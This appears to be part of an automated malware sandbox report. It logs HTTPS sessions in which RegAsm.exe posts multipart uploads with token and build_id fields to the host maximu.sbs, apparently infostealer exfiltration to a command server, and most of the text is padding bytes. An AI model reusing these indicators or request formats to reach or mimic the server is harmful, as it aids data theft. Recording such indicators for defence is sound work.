                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          17192.168.2.449772116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----x4euknopzuasjmo8g4ec
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 153381
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 78 34 65 75 6b 6e 6f 70 7a 75 61 73 6a 6d 6f 38 67 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 78 34 65 75 6b 6e 6f 70 7a 75 61 73 6a 6d 6f 38 67 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 78 34 65 75 6b 6e 6f 70 7a 75 61 73 6a 6d 6f 38 67 34 65 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------x4euknopzuasjmo8g4ecContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------x4euknopzuasjmo8g4ecContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------x4euknopzuasjmo8g4ecCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:30 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          18192.168.2.449773116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----h4euaimgdjeknyus2vs2
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------h4euaimgdjeknyus2vs2Content-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------h4euaimgdjeknyus2vs2Content-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------h4euaimgdjeknyus2vs2Cont
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
